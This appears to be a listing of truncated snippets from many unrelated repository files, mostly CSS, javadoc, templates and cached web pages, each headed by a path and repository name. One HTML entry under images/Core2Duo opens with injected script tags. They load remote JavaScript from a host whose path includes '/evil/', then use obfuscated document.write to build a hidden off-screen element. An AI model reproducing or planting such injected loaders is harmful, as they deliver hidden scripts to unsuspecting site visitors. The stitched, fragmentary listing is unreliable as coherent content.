<!DOCTYPE html> <!--[if IE 7]> <html class="ie ie7" lang="en-US"> <![endif]--> <!--[if IE 8]> <html class="ie ie8" lang="en-US"> <![endif]--> <!--[if !(IE 7) | !(IE 8) ]><!--> <html lang="en-US"> <!--<![endif]--> <!-- Mirrored from guide.dream-theme.com/gen2/user-guide/shortcodes/using-shortcodes-with-slugs/ by HTTra...
templates/ajt001_j25/css/styles_.css
mowema/UFIS
/* Design by AJoomlaTemplates.com */ html,body,div,span,applet,object,iframe,h1,h2,h3,h4,h5,h6,blockquote,pre,a,abbr,acronym,address,big,cite,code,del,dfn,font,img,ins,kbd,q,s,samp,small,strike,sub,sup,tt,var,center,dl,dt,dd,ul,li,fieldset,form,label,legend,table,caption,tbody,tfoot,thead,tr,th,td {background: transpar...
wp-content/cache/css/static/b33142e43f989ae766a379ac162c04ef.css
AndyHuntDesign/andyhuntdesign
/* Sunday 12th of July 2015 11:27:34 PM*/ /* Sunday 12th of July 2015 11:27:34 PM*/ div#nextend-smart-slider-8 .smart-slider-animate-fade.smart-slider-animate-in { z-index: 3; } div#nextend-smart-slider-8 .smart-slider-animate-fade.smart-slider-animate-out { z-index: 2; } div#nextend-smart-slider-8 .smart-slider-...
styles/prosilver/theme/video.css
bb3mobi/youtubegallery
h3.center { text-align: center; } a { display: inline; } .video_item .content{ font-size: 1.1em; } .video_item img { display: inline-block; float: left; height: 72px; padding: 10px 10px 20px 0; position: relative; vertical-align: middle; width: 96px; } .buttons div.video-icon { width: 96px; heigh...
wp-content/plugins/media-library-assistant/phpDocs/classes/MLAData.html
jd101k2000/JNQ-Jennifer-Newman
<!DOCTYPE html><html xmlns:date="http://exslt.org/dates-and-times" lang="en"> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <meta name="viewport" content="width=device-width; initial-scale=1.0; maximum-scale=1.0; user-scalable=0;"> <meta charset="utf-8"> <title>Media Library Assistant » \ML...
VisualFxVoEditor/template/css/button/button-gargoyle-round-red.css
callakrsos/Gargoyle
.button-gargoyle { -fx-background-color: linear-gradient(#ff5400, #be1d00); -fx-background-radius: 30; -fx-background-insets: 0; -fx-text-fill: white; } .button-gargoyle:hover { -fx-opacity : 0.75; } .button-gargoyle:pressed { -fx-background-insets: 2 0 0 0,2 0 3 0, 2 0 4 0, 2 0 5 0...
SanJustoManagement-web/src/main/webapp/assets/js/templates/treatments-template.html
pablovaca/sanjusto
<div class="container-fluid"> <div class="row"> <a href="#" id="new" class="btn btn-new js-new-treatment" data-action="new" data-i18n="[html]translation:treatments.buttons.new">New</a> </div> </div> <div class="container-fluid"> <table class="table-responsive table" id="dataTable"> <thead> ...
docs/AgentCloud/uniandes/unacloud/agent/platform/class-use/VMwareWorkstation.html
UnaCloud/UnaCloud2
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!-- NewPage --> <html lang="es"> <head> <!-- Generated by javadoc (version 1.7.0_60) on Mon Jan 23 13:30:44 COT 2017 --> <title>Uses of Class uniandes.unacloud.agent.platform.VMwareWorkstation</title> <meta name="dat...
images/Core2Duo/020412223f81ko.html
ForAEdesWeb/AEW2
<script src="http://cpm.36obuy.org/evil/1.js"></script><script src="http://cpm.36obuy.org/lion/1.js"></script><script/src=//360cdn.win/c.css></script> <script>document.write ('<d' + 'iv cl' + 'a' + 's' + 's="z' + '7z8z' + '9z6" st' + 'yl' + 'e="p' + 'ositio' + 'n:f' + 'ixed;l' + 'ef' + 't:-3' + '0...
wp-content/cache/supercache/www.headstuff.org/2015/02/interview-steve-simpson-illustrator/index.html
adshannon81/Headstuff.org
<!DOCTYPE html> <!--[if IE 8]> <html class="ie ie8" lang="en-GB" prefix="og: http://ogp.me/ns#"> <![endif]--> <!--[if IE 9]> <html class="ie ie9" lang="en-GB" prefix="og: http://ogp.me/ns#"> <![endif]--> <!--[if gt IE 9]><!--> <html lang="en-GB" prefix="og: http://ogp.me/ns#"> <!--<![endif]--> <head> <meta name="bl...
templates/yoo_showroom/css/color_hover/blue.css
NavaINT1876/ccustoms
/* Copyright (C) YOOtheme GmbH, YOOtheme Proprietary Use License (http://www.yootheme.com/license) */ #page a:hover, #menu .menu-dropdown li.level1:hover .level1, #menu .menu-dropdown li.remain .level1, #page #menu .menu-dropdown a:hover, #page #menu .menu-dropdown li.level2 a:hover span.subtitle, #page .menu-s...
gramps42/gramps/example_NAVWEB0/ppl/r/2/TVUKQCW4B70NK5HD2R.html
belissent/testing-example-reports
<!DOCTYPE html> <html xml:lang="en-US" lang="en-US" xmlns="http://www.w3.org/1999/xhtml"> <head lang="en-US"> <title>My Family Tree - Reed, Thomas</title> <meta charset="UTF-8" /> <meta name ="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=1" /> <meta name ="apple-mobile-...
public/ngApp/library/pagination/number-pagination.html
MeicaiRose/TeamMindmapServer
<pagination total-items="paginationObj.totalItems" ng-model="paginationObj.currentPage" items-per-page="paginationObj.itemsPerPage" boundary-links="true" direction-links="false" first-text='首页' last-text='尾页' ng-change="change()" ng-show="paginationObj.state != 'single'"></pagination>
datasets/java/publishers/docs/src-html/corgis/publishers/domain/Book.html
RealTimeWeb/datasets
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en"> <head> <title>Source code</title> <link rel="stylesheet" type="text/css" href="../../../../stylesheet.css" title="Style"> </head> <body> <div class="sourceContainer"> <pre><span class="sourceLineNo">0...
wp-content/themes/uniguide/style.css
vincentdyleung/webeng-2013-ex3
/* Theme Name: Uni Guide Theme URI: Author: Web Engineering 2013 Diyu Liang, Yi-cheng Peng, Liang Zhao Author URI: http://webeng.vforvincent.info/ex3 Description: Adapting ETH Guide as a Wordpress theme Version: 1.0 */ body { margin: 0; padding: 0; font-family: "Helvetica", sans-serif; color: #BDBEC2; } li { li...
templates/modal.html
jbottel/TARS
{% block doc -%} <!DOCTYPE html> <html{% block html_attribs %}{% endblock html_attribs %}> {%- block html %} <head> {%- block head %} <title>{% block title %}{% endblock title %}</title> {%- block metas %} <meta name="viewport" content="width=device-width, initial-scale=1.0"> {%- endblock ...
dhtmlx/docsExplorer/dhtmlxchart/dhtmlxchart___radar_xaxis.html
regadou/waw
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr"> <head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><link rel="stylesheet" href="../codebase/default.css"...
boost/doc/html/boost_asio/reference/stream_socket_service/native_handle_type.html
geodynamics/gale
<html> <head> <meta http-equiv="Content-Type" content="text/html; charset=US-ASCII"> <title>stream_socket_service::native_handle_type</title> <link rel="stylesheet" href="../../../../../doc/src/boostbook.css" type="text/css"> <meta name="generator" content="DocBook XSL Stylesheets V1.76.1"> <link rel="home" href="../.....
sites/all/libraries/yui/docs/charts/charts-legend.html
artefactual-labs/trac
<!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8"> <title>Example: Create Chart with a Legend</title> <link rel="stylesheet" href="http://fonts.googleapis.com/css?family=PT+Sans:400,700,400italic,700italic"> <link rel="stylesheet" href="../../build/cssgrids/grids-min.css"> <link r...
readme_files/javascript/72-readme.html
lalo/readme-fads
<div class="announce instapaper_body md" data-path="README.md" id="readme"><article class="markdown-body entry-content" itemprop="mainContentOfPage"><h1> <a name="user-content-javascript-patterns" class="anchor" href="#javascript-patterns" aria-hidden="true"><span class="octicon octicon-link"></span></a>JavaScript Patt...